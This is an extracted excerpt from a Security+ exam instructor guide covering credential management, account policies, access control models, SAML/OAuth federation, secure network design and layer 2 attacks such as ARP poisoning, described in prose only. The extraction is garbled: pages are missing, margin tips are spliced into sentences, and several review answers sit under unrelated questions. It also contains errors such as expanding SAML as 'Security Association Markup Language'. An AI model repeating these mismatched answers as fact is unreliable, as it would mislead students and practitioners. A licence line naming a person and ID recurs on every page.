manage devices and services. SSH uses two types of key pairs: and Third-Party
Credentials
• A host key pair identifies an SSH server. The server reveals the public part when a
client connects to it. The client must use some means of determining the validity of
this public key. If accepted, the key pair is used to encrypt the network connection
and start a session.
• A user key pair is a means for a client to login to an SSH server. The server stores a
copy of the client's public key. The client uses the linked private key to generate an
authentication request and sends the request (not the private key) to the server.
The server can only validate this request if the correct public key is held for that
client.
SSH keys have often not been managed very well, leading to numerous security
breaches, most infamously the Sony hack (ssh.com/malware). There are vendor
solutions for SSH key management or you can configure servers and clients to use
public key infrastructure (PKI) and certificate authorities (CAs) to validate identities.
A third-party credential is one used by your company to manage a vendor service or
cloud app. As well as administrative logons, devices and services may be configured
with a password or cryptographic keys to access hosts via SSH or via an application
programming interface (API). Improper management of these secrets, such as
including them in code or scripts as plaintext, has been the cause of many breaches
(nakedsecurity.sophos.com/2019/03/25/thousands-of-coders-are-leaving-their-crown-
jewels-exposed-on-github).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
188 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Security credentials for an account on Amazon Web Services (AWS). The user can authenticate with a
password credential, or use an access key within a script. The access key is stored only on the user's
client device and cannot be retrieved via the console. It can be disabled or deleted, however.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 189
Review Activity:
Identity and Account Types
Answer the following questions:
2. What is the process of ensuring accounts are only created for valid users,
only assigned the appropriate privileges, and that the account credentials
are known only to the valid user?
Onboarding.
3. What is the policy that states users should be allocated the minimum
sufficient permissions?
Least privilege.
4. What is a SOP?
A standard operating procedure (SOP) is a step-by-step listing of the actions that must
be completed for any given task.
5. What type of organizational policies ensure that at least two people have
oversight of a critical business process?
While it's possible that lax password requirements and incorrect privileges may
have contributed to the account compromise, the most glaring problem is that the
terminated employee's account wasn't disabled. Since the account was no longer being
used, it should not have been left active for a malicious user to exploit.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
190 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Interactive logon refers to starting a shell. Service accounts do not require this type
of access. Default superuser accounts, such as Administrator and root, may also be
disabled, or limited to use in system recovery or repair.
SSH and API keys are often unsecurely embedded in computer code or uploaded
mistakenly to repositories alongside code. Also, managing shared credentials can be
difficult, and many sites resort to storing them in a shared spreadsheet.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 191
Topic 8B
Implement Account Policies
As well as authenticating the user, an account can be configured with attributes as Account Attributes and
a user profile. Account objects can also be used to assign permissions and access Access Policies
policies.
Account Attributes
A user account is defined by a unique security identifier (SID), a name, and a
credential. Each account is associated with a profile. The profile can be defined with
custom identity attributes describing the user, such as a full name, email address,
contact number, department, and so on. The profile may support media, such as an
account picture.
As well as attributes, the profile will usually provide a location for storing user-
generated data files (a home folder). The profile can also store per-account settings for
software applications.
Access Policies
Each account can be assigned permissions over files and other network resources
and access policies or privileges over the use and configuration of network hosts.
These permissions might be assigned directly to the account or inherited through
membership of a security group or role. Access policies determine things like the right
to log on to a computer locally or via remote desktop, install software, change the
network configuration, and so on.
On a Windows Active Directory network, access policies can be configured via group
policy objects (GPOs). GPOs can be used to configure access rights for user/group/
role accounts. GPOs can be linked to network administrative boundaries in Active
Directory, such as sites, domains, and Organizational Units (OU).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
192 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Configuring access policies and rights using Group Policy Objects in Windows Server 2016.
(Screenshot used with permission from Microsoft.)
Teaching
• Password length—enforces a minimum length for passwords. There may also be a
Tip
maximum length.
Students should • Password complexity—enforces password complexity rules (that is, no use of
appreciate that the username within password and combination of at least eight upper/lower case
syllabus regards
complexity and
alpha-numeric and non-alpha-numeric characters).
aging as appropriate
policies, but make
• Password aging—forces the user to select a new password after a set number of
them aware of days.
the updated NIST
guidance. • Password reuse and history—prevents the selection of a password that has been
used already. The history attribute sets how many previous passwords are blocked.
In this context, you should note that the most recent guidance issued by NIST (nvlpubs.
nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63b.pdf) deprecates some of the
"traditional" elements of password policy:
• Complexity rules should not be enforced. The user should be allowed to choose
a password (or other memorized secret) of between 8 and 64 ASCII or UNICODE
characters, including spaces. The only restriction should be to block common
passwords, such as dictionary words, repetitive strings (like 12345678), strings
found in breach databases, and strings that repeat contextual information, such as
username or company name.
• Aging policies should not be enforced. Users should be able to select if and when
a password should be changed, though the system should be able to force a
password change if compromise is detected.
• Password hints should not be used. A password hint allows account recovery by
submitting responses to personal information, such as first school or pet name.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 193
Password reuse can also mean using a work password elsewhere (on a website, for
instance). This sort of behavior can only be policed by soft policies.
To make the task of compromising the user security system harder, account Account Restrictions
restrictions can be used.
Location-Based Policies
A user or device can have a logical network location, identified by an IP address,
subnet, virtual LAN (VLAN), or organizational unit (OU). This can be used as an account
restriction mechanism. For example, a user account may be prevented from logging on
locally to servers within a restricted OU.
The geographical location of a user or device can also be calculated using a geolocation
mechanism. There are several types of geolocation:
• IP address—these can be associated with a map location to varying degrees of
accuracy based on information published by the registrant, including name, country,
region, and city. The registrant is usually the Internet service provider (ISP), so the
information you receive will provide an approximate location of a host based on the
ISP. If the ISP is one that serves a large or diverse geographical area, you will be less
likely to pinpoint the location of the host Internet service providers (ISPs). Software
libraries, such as GeoIP (maxmind.com/en/geoip-demo), facilitate querying this data.
Time-Based Restrictions
There are three main types of time-based policies:
• A time of day policy establishes authorized logon hours for an account.
• A time-based login policy establishes the maximum amount of time an account may
be logged in for.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
194 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• An impossible travel time/risky login policy tracks the location of login events over
time. If these do not meet a threshold, the account will be disabled. For example, a
user logs in to an account from a device in New York. A couple of hours later, a login
attempt is made from LA, but this is refused and an alert raised because it is not
feasible for the user to be in both locations.
Account auditing also refers to more general change control. You need to take account
of changes to resources and users. Resources may be updated, archived, or have their
clearance level changed. Users may leave, arrive, or change jobs (roles). For example,
if a user has moved to a new job, old privileges may need to be revoked and new ones
granted. This process is referred to as recertification. Managing these sorts of changes
efficiently and securely requires effective standard operating procedures (SOPs) and
clear and timely communication between departments (between IT and HR, for instance).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 195
Where many users, groups, roles, and resources are involved, managing account Account Permissions
permissions is complex and time-consuming. Improperly configured accounts can
have two different types of impact. On the one hand, setting privileges that are too
restrictive creates a large volume of support calls and reduces productivity. On the
other hand, granting too many privileges to users weakens the security of the system
and increases the risk of things like malware infection and data breach.
The phrase "authorization creep" refers to an employee who gains more and more access
privileges the longer they remain with the organization.
A user may be granted elevated privileges temporarily (escalation). In this case, some
system needs to be in place to ensure that the privileges are revoked at the end of the
agreed period.
A system of auditing needs to be put in place so that privileges are reviewed regularly.
Auditing would include monitoring group membership and reviewing access control
lists for each resource plus identifying and disabling unnecessary accounts.
Usage auditing means configuring the security log to record key indicators and then Account Permissions
reviewing the logs for suspicious activity. Determining what to log is one of the most Usage Audits
considerable challenges a network administrator can face. For Active Directory,
Microsoft has published audit policy recommendations for baseline requirements and
networks with stronger security requirements (docs.microsoft.com/en-us/windows-
server/identity/ad-ds/plan/security-best-practices/audit-policy-recommendations).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
196 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Process creation.
• Changes to system security and integrity (anti-virus, host firewall, and so on).
Configuring audit entries for a folder in Windows. (Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 197
Setting a property to disable an account. (Screenshot used with permission from Microsoft.)
An account lockout means that login is prevented for a period. This might be
done manually if a policy violation is detected, but there are several scenarios for
automatically applying a lockout:
• An incorrect account password is entered repeatedly.
• The account is set to expire. Setting an account expiration date means that an
account cannot be used beyond a certain date. This option is useful on accounts for
temporary and contract staff.
Configuring an account lockout policy. (Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
198 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Account Policies
Answer the following questions:
1. What container would you use if you want to apply a different security
policy to a subset of objects within the same domain?
More users would forget their password, try to select unsecure ones, or write them
down/record them in a non-secure way (like a sticky note).
3. What is the name of the policy that prevents users from choosing old
passwords again?
An IP address can represent a logical location (subnet) on a private network. Most types
of public IP address can be linked to a geographical location, based on information
published by the registrant that manages that block of iP address space.
A user's actions are logged on the system. Each user is associated with a unique
computer account. As long as the user's authentication is secure and the logging
system is tamper-proof, they cannot deny having performed the action.
Usage events must be recorded in a log. Choosing which events to log will be guided by
an audit policy.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 199
Topic 8C
Implement Authorization Solutions
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
200 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Configuring an access control entry for a folder. (Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 201
The effect of this command is to append write permission to the group context and
remove execute permission from the other context. By contrast, the command can also
be used to replace existing permissions. For example, the following command applies
the configuration shown in the first permission string:
chmod u=rwx,g=rx,o=rx home
In absolute mode, permissions are assigned using octal notation, where r=4, w=2, and
x=1. For example, the following command has the same effect:
chmod 755 home
The DAC and RBAC models expose privileged accounts to the threat of compromise. Mandatory and
More restrictive access control models can be used to mitigate this threat. Attribute-Based Access
Control
Mandatory Access Control (MAC)
Mandatory access control (MAC) is based on the idea of security clearance levels.
Rather than defining ACLs on resources, each object and each subject is granted a
clearance level, referred to as a label. If the model used is a hierarchical one (that is,
high clearance users are trusted to access low clearance objects), subjects are only
permitted to access objects at their own clearance level or below.
The labelling of objects and subjects takes place using pre-established rules. The critical
point is that these rules cannot be changed by any subject account, and are therefore
non-discretionary. Also, a subject is not permitted to change an object's label or to
change his or her own label.
Rule-based access control is a term that can refer to any sort of access control model Rule-Based Access
where access control policies are determined by system-enforced rules rather than Control
system users. As such, RBAC, ABAC, and MAC are all examples of rule-based (or non-
discretionary) access control. As well as the formal models, rule-based access control Teaching
principles are increasingly being implemented to protect computer and network Tip
systems founded on discretionary access from the sort of misconfiguration that can Rule-based access
occur through DAC. control is also not
necessarily dependent
Conditional Access on the identity of the
user (a firewall ACL,
Conditional access is an example of rule-based access control. A conditional access for instance).
system monitors account or device behavior throughout a session. If certain
conditions are met, the account may be suspended or the user may be required to
re-authenticate, perhaps using a 2-step verification method. The User Account Control
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
202 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
(UAC) and sudo restrictions on privileged accounts are examples of conditional access.
The user is prompted for confirmation or authentication when requests that require
elevated privileges are made. Role-based rights management and ABAC systems can
apply a number of criteria to conditional access, including location-based policies
(docs.microsoft.com/en-us/azure/active-directory/conditional-access/overview).
Browsing objects in an Active Directory LDAP schema. (Screenshot used with permission from Microsoft.)
The types of attributes, what information they contain, and the way object types are
defined through attributes (some of which may be required, and some optional) is
described by the directory schema. Some of the attributes commonly used include
common name (CN), organizational unit (OU), organization (O), country (C), and domain
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 203
component (DC). For example, the distinguished name of a web server operated by
Widget in the UK might be:
CN=WIDGETWEB, OU=Marketing, O=Widget, C=UK,
DC=widget, DC=foo
An on-premises network can use technologies such as LDAP and Keberos, very often Federation and
implemented as a Windows Active Directory network, because the administration Attestation
of accounts and devices can be centralized. Expanding this type of network to share
resources with business partners or use services in public clouds means implementing Teaching
some type of federation technology. Tip
Make sure that
Federation students understand
the concepts of
Federation is the notion that a network needs to be accessible to more than just a federation and trusts
well-defined group of employees. In business, a company might need to make parts of and that SAML is a
its network open to partners, suppliers, and customers. The company can manage its means of exchanging
authorizations in a
employee accounts easily enough. Managing accounts for each supplier or customer federated network.
internally may be more difficult. Federation means that the company trusts accounts
created and managed by a different network. As another example, in the consumer
world, a user might want to use both Google Apps and Twitter. If Google and Twitter
establish a federated network for the purpose of authentication and authorization,
then the user can log on to Twitter using his or her Google credentials or vice versa.
2. The principal authenticates with the identity provider and obtains an attestation
of identity, in the form of some sort of token or document signed by the IdP.
3. The principal presents the attestation to the service provider. The SP can validate
that the IdP has signed the attestation because of its trust relationship with
the IdP.
4. The service provider can now connect the authenticated principal to its own
accounts database. It may be able to query attributes of the user account profile
held by the IdP, if the principal has authorized this type of access.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
204 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 205
IssueInstant="2020-01-01T20:00:10Z "
Destination="https://sp.foo/saml/acs"
InResponseTo="100".
<saml:Issuer>https://idp.foo/sso</saml:Issuer>
<ds:Signature>...</ds:Signature>
<samlp:Status>...(success)...</samlp:Status.
<saml:Assertion xmlns:xsi="http://www.w3.org/2001/
XMLSchema-instance"
xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="2000"
Version="2.0"
IssueInstant="2020-01-01T20:00:09Z">
<saml:Issuer>https://idp.foo/sso</saml:Issuer>
<ds:Signature>...</ds:Signature>
<saml:Subject>...
<saml:Conditions>...
<saml:AudienceRestriction>...
<saml:AuthnStatement>...
<saml:AttributeStatement>
<saml:Attribute>...
<saml:Attribute>...
</saml:AttributeStatement>
</saml:Assertion>
</samlp:Response> Show Slide(s)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
206 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
The client app or service must be registered with the authorization server. As part of
this process, the client registers a redirect URL, which is the endpoint that will process
authorization tokens. Registration also provides the client with an ID and a secret.
The ID can be publicly exposed, but the secret must be kept confidential between the
client and the authorization server. When the client application requests authorization,
the user approves the authorization server to grant the request using an appropriate
method. OAuth supports several grant types—or flows—for use in different contexts,
such as server to server or mobile app to server. Depending on the flow type, the
client will end up with an access token validated by the authorization server. The client
presents the access token to the resource server, which then accepts the request for
the resource if the token is valid.
OAuth uses the JavaScript object notation (JSON) web token (JWT) format for claims
data. JWTs can easily be passed as Base64-encoded strings in URLs and HTTP headers
and can be digitally signed for authentication and integrity.
Note that OpenID can also refer to an earlier protocol developed between 2005 and 2007.
This implemented a similar framework and underpinned early "sign on with" functionality,
but is now regarded as obsolete. OpenID uses XML-format messaging and supports only
web applications and not mobile apps.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 207
Review Activity:
Authorization Solutions
Answer the following questions:
It is easier for users to adjust the policy to fit changing business needs. Centralized
policies can easily become inflexible and bureaucratic.
A group is simply a container for several user objects. Any organizing principle can be
applied. In a role-based access control system, groups are tightly defined according to
job functions. Also, a user should (logically) only possess the permissions of one role at
a time.
3. In a rule-based access control model, can a subject negotiate with the data
owner for access privileges? Why or why not?
This sort of negotiation would not be permitted under rule-based access control; it is a
feature of discretionary access control.
To store information about network resources and users in a format that can be
accessed and updated using standard queries.
True.
6. You are working on a cloud application that allows users to log on with
social media accounts over the web and from a mobile application. Which
protocols would you consider and which would you choose as most
suitable?
Security Association Markup Language (SAML) and Oauth + OpenID Connect (OIDC).
OAuth with OIDC as an authentication layer offers better support for native mobile
apps so is probably the best choice.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
208 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 8D
Explain the Importance
of Personnel Policies
Show Slide(s)
Conduct Policies
Operational policies include privilege/credential management, data handling, and
Conduct Policies incident response. Other important security policies include those governing employee
conduct and respect for privacy.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 209
Another essential component of a secure system is effective user training. Untrained User and Role-Based
users represent a serious vulnerability because they are susceptible to social Training
engineering and malware attacks and may be careless when handling sensitive or
confidential data.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
210 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Site security procedures, restrictions, and advice, including safety drills, escorting
guests, use of secure areas, and use of personal devices.
• Password and account management plus security features of PCs and mobile
devices.
• Secure use of software such as browsers and email clients plus appropriate use of
Internet access, including social networking sites.
Phishing Campaigns
A phishing campaign training event means sending simulated phishing messages to
users. Users that respond to the messages can be targeted for follow-up training.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 211
and the participant must use analysis and appropriate tools to discover it. Capturing
the flag allows the user to progress to the next level and start a new challenge. Once
the participant has passed the introductory levels, they will join a team and participate
in a competitive event, where there are multiple flags embedded in the environment
and capturing them wins points for the participant and for their team.
CBT might use video game elements to improve engagement. For example, students
might win badges and level-up bonuses such as skills or digitized loot to improve
their in-game avatar. Simulations might be presented so that the student chooses
encounters from a map and engages with a simulation environment in a first person
shooter type of 3D world.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
212 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Importance of Personnel Policies
Answer the following questions:
1. Your company has been the victim of several successful phishing attempts
over the past year. Attackers managed to steal credentials from these
attacks and used them to compromise key systems. What vulnerability
contributed to the success of these social engineers, and why?
A lack of proper user training directly contributes to the success of social engineering
attempts. Attackers can easily trick users when those users are unfamiliar with the
characteristics and ramifications of such deception.
Employees have different levels of technical knowledge and different work priorities.
This means that a "one size fits all" approach to security training is impractical.
Using a diversity of training techniques will boost engagement and retention. Practical
tasks, such as phishing simulations, will give attendees more direct experience.
Workshops or computer-based training will make it easier to assess whether the
training has been completed.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 213
Lesson 8
Summary
You should be able to apply organizational and technical policies and training/ Teaching
awareness programs that reduce the risk of insider threat and account compromise. Tip
You should also be able to implement discretionary or rule-based access control Check that students
as appropriate and use protocols to communicate authorizations across federated are confident about
identity networks. the content that has
been covered. If there
is time, re-visit any
Guidelines for Implementing Identity and content examples that
they have questions
Account Management Controls about. If you have
used all the available
Follow these guidelines when you implement identity and account management time for this lesson
controls for local networks and cloud access: block, note the issues,
and schedule time for
• Establish requirements for access control between discretionary, role-based, a review later in the
mandatory, and attribute-based and whether the scope must include federated course.
services (on-premises and cloud, for instance).
Interaction
• Configure accounts/roles and resources with the appropriate permissions settings, Opportunity
using the principle of least privilege. Optionally, ask
students if they have
• Configure account policies to protect integrity: experience of single
sign-on with cloud
• Credential policies to ensure protection of standard and privileged accounts, apps, and whether
including secure password selection. they are aware of the
implementation that
• Credential policies to manage shared, device, and third-party/API secrets. it uses.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 9
Implementing Secure Network Designs
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
216 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 9A
Implement Secure Network Designs
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 217
You can see that this type of business flow will involve systems in different places in
the network. Placing the client, the mailbox, and the mail transfer server all within the
same logical network "segment" will introduce many vulnerabilities. Understanding and
controlling how data flows between these locations is a key part of secure and effective
network design.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
218 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Appliances, protocols, and addressing functions within the OSI network layer reference model.
(Images © 123RF.com.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 219
ARP in action—An ARP broadcast is used when there is no MAC:IP mapping in the cache and is
received by all hosts on the same network, but only the host with the requested
IP should reply. (Images © 123RF.com.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
220 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
within the same broadcast domain. Segregation means that the hosts in one segment
are restricted in the way they communicate with hosts in other segments. They might
only be able to communicate over certain network ports, for instance.
"Freely" means that no network appliances or policies are preventing communications. Each
host may be configured with access rules or host firewalls or other security tools to prevent
access, but the "view from the network" is that hosts in the same segment are all free to
attempt to communicate.
Hosts are trusted in the sense that they are under your administrative control and subject to
the security mechanisms (anti-virus software, user rights, software updating, and so on) that
you have set up to defend the network.
A large network may need more zones to represent different host groups, such as
separating wireless stations from desktop workstations, and putting servers in their
own groups. Cisco's enterprise security architecture uses core and distribution layers
to interconnect access blocks, with each access block representing a different zone and
business function.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 221
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
222 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• A DMZ for servers providing remote access to the local network via a Virtual Private
Network (VPN).
Screened Subnet
A screened subnet uses two firewalls placed on either side of the DMZ. The edge
firewall restricts traffic on the external/public interface and allows permitted traffic
to the hosts in the DMZ. The edge firewall can be referred to as the screening firewall
or router. The internal firewall filters communications between hosts in the DMZ and
hosts on the LAN. This firewall is often described as the choke firewall. A choke point
is a purposefully narrow gateway that facilitates better access control and easier
monitoring.
Triple-Homed Firewall
A DMZ can also be established using one router/firewall appliance with three network
interfaces, referred to as triple-homed. One interface is the public one, another is the
DMZ, and the third connects to the LAN. Routing and filtering rules determine what
forwarding is allowed between these interfaces. This can achieve the same sort of
configuration as a screened subnet.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 223
Sometimes the term DMZ (or "DMZ host") is used by SOHO router vendors to mean
a host on the local network that accepts connections from the Internet. This might be
simpler to configure and solve some access problems, but it makes the whole network
very vulnerable to intrusion and DoS. An enterprise DMZ is established by a separate
network interface and subnet so that traffic between hosts in the DMZ and the LAN
must be routed (and subject to firewall rules). Most SOHO routers do not have the
necessary ports or routing functionality to create a true DMZ.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
224 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
The Internet Society has published a white paper on security implications of IPv6
(internetsociety.org/wp-content/uploads/2019/03/deploy360-ipv6-security-v1.0.pdf).
Infoblox's white paper on migrating services to IPv6 provides more useful context (infoblox.
com/wp-content/uploads/2016/04/infoblox-whitepaper-seven-deadly-traps-of-ipv6-
deployment_0.pdf).
Zero Trust
Zero trust is based on the idea that perimeter security is unlikely to be completely
robust. On a modern network, there are just too many opportunities for traffic to
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 225
escape monitoring by perimeter devices and DMZs. Zero trust uses systems such as
continuous authentication and conditional access to mitigate privilege escalation and
account compromise by threat actors.
Another zero trust technique is to apply microsegmentation. Microsegmentation is a
security process that is capable of applying policies to a single node, as though it was
in a zone of its own. Like east-west traffic, this requires a new generation of virtualized
security appliances to implement (vmware.com/solutions/micro-segmentation.html).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
226 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Secure Network Designs
Answer the following questions:
The Internet is an external zone where none of the hosts accessing your services can
be assumed trusted or authenticated. An extranet is a zone allowing controlled access
to semi-trusted hosts, implying some sort of authentication. The hosts are semi-trusted
because they are not under the administrative control of the organization (as they are
owned by suppliers, customers, business partners, contractors, and so on).
By using two firewalls (external and internal) around a screened subnet, or by using a
triple-homed firewall (one with three network interfaces).
5. What type of network requires the design to account for east-west traffic?
This is typical of a data center or server farm, where a single external request causes
multiple cascading requests between servers within the data center. This is a problem
for a perimeter security model, as funneling this traffic up to a firewall and then back to
a server creates a performance bottleneck.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 227
Topic 9B
Implement Secure
Switching and Routing
A host uses the Address Resolution Protocol (ARP) to discover the host on the local ARP Poisoning and
segment that owns an IP address. MAC Flooding Attacks
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
228 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
This screenshot shows packets captured during a typical ARP poisoning attack:
• In frames 6-8, the attacking machine (with MAC address ending :4a) directs
gratuitous ARP replies at other hosts (:76 and :77), claiming to have the IP addresses
.2 and .102.
• In frame 9, the .101/:77 host tries to send a packet to the .2 host, but it is received
by the attacking host (with the destination MAC :4a).
• In frame 10, the attacking host retransmits frame 9 to the actual .2 host. Wireshark
colors the frame black and red to highlight the retransmission.
• In frames 11 and 12, you can see the reply from .2, received by the attacking host in
frame 11 and retransmitted to the legitimate host in frame 12.
The usual target will be the subnet's default gateway (the router that accesses other
networks). If the ARP poisoning attack is successful, all traffic destined for remote
networks will be sent to the attacker. The attacker can perform a man-in-the-middle
attack, either by monitoring the communications and then forwarding them to the
router to avoid detection, or modifying the packets before forwarding them. The
attacker could also perform a denial of service attack by not forwarding the packets.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 229
forward unicast traffic to its correct destination. Overwhelming the table can cause the
switch to stop trying to apply MAC-based forwarding and flood unicast traffic out of all
ports, working as a hub. This makes sniffing network traffic easier for the threat actor.
An Ethernet switch's layer 2 forwarding function is similar to that of an older network Loop Prevention
appliance called a bridge. In a network with multiple bridges, implemented these
days as switches, there may be more than one path for a frame to take to its intended Teaching
destination. As a layer 2 protocol, Ethernet has no concept of Time To Live. Therefore, Tip
layer 2 broadcast traffic could continue to loop through a network with multiple Students should be
paths indefinitely. Layer 2 loops are prevented by the Spanning Tree Protocol (STP). familiar with the
Spanning tree is a means for the bridges to organize themselves into a hierarchy and concept of STP from
prevent loops from forming. the Network+ course.
STP configuration.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
230 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
DHCP Snooping
Another option is to configure Dynamic Host Configuration Protocol (DHCP)
snooping. DHCP is the protocol that allows a server to assign IP address information to
a client when it connects to the network. DHCP snooping inspects this traffic arriving on
access ports to ensure that a host is not trying to spoof its MAC address. It can also be
used to prevent rogue (or spurious) DHCP servers from operating on the network. With
DHCP snooping, only DHCP messages from ports configured as trusted are allowed.
Additionally dynamic ARP inspection (DAI), which can be configured alongside DHCP
snooping, prevents a host attached to an untrusted port from flooding the segment
with gratuitous ARP replies. DAI maintains a trusted database of IP:ARP mappings
and ensures that ARP packets are validly constructed and use valid IP addresses
(cisco.com/c/en/us/td/docs/switches/lan/catalyst6500/ios/12-2SX/configuration/guide/
book/snoodhcp.html).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 231
Endpoint security is a set of security procedures and technologies designed to restrict Network Access
network access at a device level. Endpoint security contrasts with the focus on Control
perimeter security established by topologies such as DMZ and technologies such as
firewalls. Endpoint security does not replace these but adds defense in depth. Teaching
Tip
The IEEE 802.1X standard defines a port-based network access control (PNAC)
You can mention
mechanism. PNAC means that the switch uses an AAA server to authenticate the
zero-trust and
attached device before activating the port. Network access control (NAC) products unified endpoint
can extend the scope of authentication to allow administrators to devise policies or management (UEM)
profiles describing a minimum security configuration that devices must meet to be solutions as modern
granted network access. This is called a health policy. Typical policies check things such implementations of
as malware infection, firmware and OS patch level, personal firewall status, and the NAC.
presence of up-to-date virus definitions. A solution may also be to scan the registry or
perform file signature verification. The health policy is defined on a NAC management
server along with reporting and configuration tools.
Posture assessment is the process by which host health checks are performed against
a client device to verify compliance with the health policy. Most NAC solutions use
client software called an agent to gather information about the device, such as its anti-
virus and patch status, presence of prohibited applications, or anything else defined by
the health policy.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
232 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Packet Fence supports the use of several scanning techniques, including vulnerability scanners, such
